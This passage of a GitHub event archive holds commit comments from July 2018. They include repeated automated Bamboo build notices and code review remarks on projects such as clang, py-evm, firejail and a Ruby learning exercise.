needed). To get successful boot, either this patch should be disabled again, or at least place the status of spi-flash in \"disabled\" mode. I think I will do the later ..."}},"created_at":"2018-07-31T18:31:40Z"}
{"id":"8045893312","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909322,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-31T18:31:46Z","updated_at":"2018-07-31T18:31:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:31:46Z"}
{"id":"8045895138","type":"CommitCommentEvent","actor":{"login":"mshriver"},"repo":{"name":"ManageIQ/integration_tests"},"payload":{"comment":{"id":29909328,"position":null,"line":null,"path":null,"commit_id":"ad6118612fe3cc46be172238d47e9da3b5af0817","created_at":"2018-07-31T18:32:08Z","updated_at":"2018-07-31T18:32:08Z","author_association":"MEMBER","body":"nice"}},"created_at":"2018-07-31T18:32:08Z"}
{"id":"8045895283","type":"CommitCommentEvent","actor":{"login":"pipermerriam"},"repo":{"name":"cburgdorf/py-evm"},"payload":{"comment":{"id":29909330,"position":19,"line":193,"path":"eth/vm/logic/arithmetic.py","commit_id":"fc3db77c1a9872b744febc731b8768ec2a5a5a3e","created_at":"2018-07-31T18:32:09Z","updated_at":"2018-07-31T18:32:09Z","author_association":"NONE","body":"This is true, however, I'd prefer we start here and move to a library approach later after measuring the performance."}},"created_at":"2018-07-31T18:32:09Z"}
{"id":"8045895777","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909331,"position":251,"line":251,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:32:14Z","updated_at":"2018-07-31T18:32:14Z","author_association":"OWNER","body":"That's true. I will still need to look at the core data structure (Pointer, Owner, Pset) with the now clearer understanding from the new revision of the paper."}},"created_at":"2018-07-31T18:32:14Z"}
{"id":"8045897472","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909333,"position":352,"line":352,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:32:34Z","updated_at":"2018-07-31T18:32:34Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-31T18:32:34Z"}
{"id":"8045897648","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909334,"position":55,"line":50,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:32:36Z","updated_at":"2018-07-31T18:32:36Z","author_association":"NONE","body":"переменная `@current_station`, мне кажется нигде не инициализируется до этой строки\r\nну т.е. я хочу сказать, что после присвоения поезду маршрута в ней пусто и если вызвать этот метод, то будет ошибка\r\n\r\nвы проверяли работу ваших методов в консоли ? \r\nэто очень рекомендуемая практика: как в скринкасте - пишем код, далее смотрим как он работает"}},"created_at":"2018-07-31T18:32:36Z"}
{"id":"8045897955","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909335,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-31T18:32:40Z","updated_at":"2018-07-31T18:32:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:32:40Z"}
{"id":"8045899493","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909337,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-31T18:32:57Z","updated_at":"2018-07-31T18:32:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:32:57Z"}
{"id":"8045902971","type":"CommitCommentEvent","actor":{"login":"rajaram008"},"repo":{"name":"rajaram008/Python-Assignement4.1"},"payload":{"comment":{"id":29909347,"position":null,"line":null,"path":null,"commit_id":"7a9a6dbc0fa57b17e64887bbf9e804636e55d614","created_at":"2018-07-31T18:33:38Z","updated_at":"2018-07-31T18:33:38Z","author_association":"OWNER","body":"remove\r\n"}},"created_at":"2018-07-31T18:33:38Z"}
{"id":"8045903926","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909349,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-31T18:33:49Z","updated_at":"2018-07-31T18:33:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:33:49Z"}
{"id":"8045904149","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909350,"position":440,"line":440,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:33:51Z","updated_at":"2018-07-31T18:33:51Z","author_association":"OWNER","body":"I think that in my former model, a variable `int *` could be both a Pointer and a Owner at the same time; it would become a owner when taking the address of it. Anyway, I want to rework this structure."}},"created_at":"2018-07-31T18:33:51Z"}
{"id":"8045905681","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909360,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T18:34:08Z","updated_at":"2018-07-31T18:34:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:34:08Z"}
{"id":"8045906731","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909366,"position":55,"line":50,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:34:20Z","updated_at":"2018-07-31T18:34:20Z","author_association":"NONE","body":"лучше не вводить эту переменную совсем, это будет совсем сложно - две переменных (индекс и станция), которые отвечают за одно и то же\r\nздесь лучше просто обращаться к методу, т.е. просто убрать в начале строки `@`, а остальное оставить как есть\r\n(аналогично во всех остальных строчках, где идет обращение к этой переменной)"}},"created_at":"2018-07-31T18:34:20Z"}
{"id":"8045910240","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909379,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-31T18:35:00Z","updated_at":"2018-07-31T18:35:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:35:00Z"}
{"id":"8045910845","type":"CommitCommentEvent","actor":{"login":"gebner"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":29909380,"position":38,"line":39,"path":"examples/tstp_statistics/TstpStatistics.scala","commit_id":"e1469d67c7bc750dd533bd36525ffee4558385e4","created_at":"2018-07-31T18:35:08Z","updated_at":"2018-07-31T18:35:08Z","author_association":"MEMBER","body":"Just fyi: there are `.max`, `.min`, and `.sum` methods on `Seq` and they all work on BigInts."}},"created_at":"2018-07-31T18:35:08Z"}
{"id":"8045911915","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909381,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-31T18:35:19Z","updated_at":"2018-07-31T18:35:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:35:19Z"}
{"id":"8045912634","type":"CommitCommentEvent","actor":{"login":"lurtzerika"},"repo":{"name":"lurtzerika/scoala-informala-homework"},"payload":{"comment":{"id":29909385,"position":null,"line":null,"path":null,"commit_id":"4506b27d8659e8cf9e03882c793f7f450757efba","created_at":"2018-07-31T18:35:28Z","updated_at":"2018-07-31T18:35:28Z","author_association":"OWNER","body":"3. Input Data Validation"}},"created_at":"2018-07-31T18:35:28Z"}
{"id":"8045913418","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909386,"position":57,"line":52,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:35:35Z","updated_at":"2018-07-31T18:35:35Z","author_association":"NONE","body":"индекс уже увеличился, поэтому здесь снова можно вызывать метод `current_staiton` вместо того, чтобы писать этот длинный код перед вызовом `.accept_train(self)`"}},"created_at":"2018-07-31T18:35:35Z"}
{"id":"8045916269","type":"CommitCommentEvent","actor":{"login":"quicquid"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":29909396,"position":38,"line":39,"path":"examples/tstp_statistics/TstpStatistics.scala","commit_id":"e1469d67c7bc750dd533bd36525ffee4558385e4","created_at":"2018-07-31T18:36:06Z","updated_at":"2018-07-31T18:36:06Z","author_association":"CONTRIBUTOR","body":"oh thanks! i'm sure it's faster than my code"}},"created_at":"2018-07-31T18:36:06Z"}
{"id":"8045916590","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909397,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-31T18:36:10Z","updated_at":"2018-07-31T18:36:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:36:10Z"}
{"id":"8045917113","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29909399,"position":null,"line":null,"path":null,"commit_id":"a2b06c06402cd7966c5433cbb0a473d2ad074fcb","created_at":"2018-07-31T18:36:15Z","updated_at":"2018-07-31T18:36:15Z","author_association":"OWNER","body":"https://redux.js.org/basics/usagewithreact\r\nhttps://github.com/reduxjs/react-redux\r\n\r\nReact often leverages Redux for more predictable state management via the react-redux bindings. These bindings give us an API that simplifies the most common interactions between React and Redux.\r\n\r\nProvider makes it possible for Redux to pass data from the store to any React components that need it. It uses React’s context feature to make this work.\r\n\r\nconnect() connects a React component to the Redux store. The mapStateToProps() function allows us to specify which state from the store you want passed to your React component, while the mapDispatchToProps() function allows us to bind dispatch to action creators before they ever hit the component."}},"created_at":"2018-07-31T18:36:15Z"}
{"id":"8045918155","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909402,"position":58,"line":53,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:36:28Z","updated_at":"2018-07-31T18:36:28Z","author_association":"NONE","body":"эта строчка не нужна с учетом предыдущих комментариев"}},"created_at":"2018-07-31T18:36:28Z"}
{"id":"8045918249","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909403,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-31T18:36:30Z","updated_at":"2018-07-31T18:36:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:36:30Z"}
{"id":"8045918685","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29909406,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T18:36:34Z","updated_at":"2018-07-31T18:36:34Z","author_association":"COLLABORATOR","body":"You can see this if you put `printf(\"%s\\n\",enames[0]);` after `enames[0] = expand_home(..);`. Putting `noblacklist ${DOWNLOADS}` will result in that print statement printing `${DOWNLOADS}` rather than the proper resolved path. Going into `expand_home`, it's clear that the `strncmp` itself isn't matching, but I'm not sure why."}},"created_at":"2018-07-31T18:36:34Z"}
{"id":"8045921583","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909414,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-31T18:37:09Z","updated_at":"2018-07-31T18:37:09Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-31T18:37:09Z"}
{"id":"8045922558","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909418,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T18:37:20Z","updated_at":"2018-07-31T18:37:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:37:20Z"}
{"id":"8045923415","type":"CommitCommentEvent","actor":{"login":"rajaram008"},"repo":{"name":"rajaram008/Python-Assignement4.1"},"payload":{"comment":{"id":29909423,"position":null,"line":null,"path":null,"commit_id":"3e878487fb85944c5e7d3c6367de574ff0d60b49","created_at":"2018-07-31T18:37:30Z","updated_at":"2018-07-31T18:37:30Z","author_association":"OWNER","body":"remove"}},"created_at":"2018-07-31T18:37:30Z"}
{"id":"8045924040","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909424,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-31T18:37:38Z","updated_at":"2018-07-31T18:37:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:37:38Z"}
{"id":"8045924169","type":"CommitCommentEvent","actor":{"login":"ve4edj"},"repo":{"name":"eriknyquist/clang"},"payload":{"comment":{"id":29909427,"position":null,"line":null,"path":null,"commit_id":"8e119947e16669080b010e3b0583bd02ade2ee5c","created_at":"2018-07-31T18:37:40Z","updated_at":"2018-07-31T18:37:40Z","author_association":"NONE","body":"What still needs to be done to get this merged? I'd be interested in helping push this through but it looks like you already have a pretty complete implementation here"}},"created_at":"2018-07-31T18:37:40Z"}
{"id":"8045926449","type":"CommitCommentEvent","actor":{"login":"rajaram008"},"repo":{"name":"rajaram008/Python-Assignement4.1"},"payload":{"comment":{"id":29909433,"position":null,"line":null,"path":null,"commit_id":"bef112e0e7ac43fd9f219851923362d4be8c6c02","created_at":"2018-07-31T18:38:06Z","updated_at":"2018-07-31T18:38:06Z","author_association":"OWNER","body":"removed"}},"created_at":"2018-07-31T18:38:06Z"}
{"id":"8045930232","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909443,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-31T18:38:49Z","updated_at":"2018-07-31T18:38:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:38:49Z"}
{"id":"8045931976","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29909447,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T18:39:10Z","updated_at":"2018-07-31T18:39:10Z","author_association":"OWNER","body":"So weird. Alright, 0 exclusion it is."}},"created_at":"2018-07-31T18:39:10Z"}
{"id":"8045932380","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909449,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-31T18:39:14Z","updated_at":"2018-07-31T18:39:14Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-31T18:39:14Z"}
{"id":"8045934609","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909457,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-31T18:39:40Z","updated_at":"2018-07-31T18:39:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:39:40Z"}
{"id":"8045935265","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29909458,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T18:39:47Z","updated_at":"2018-07-31T18:39:47Z","author_association":"MEMBER","body":"Looking even better!"}},"created_at":"2018-07-31T18:39:47Z"}
{"id":"8045936635","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909462,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-31T18:40:00Z","updated_at":"2018-07-31T18:40:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:40:00Z"}
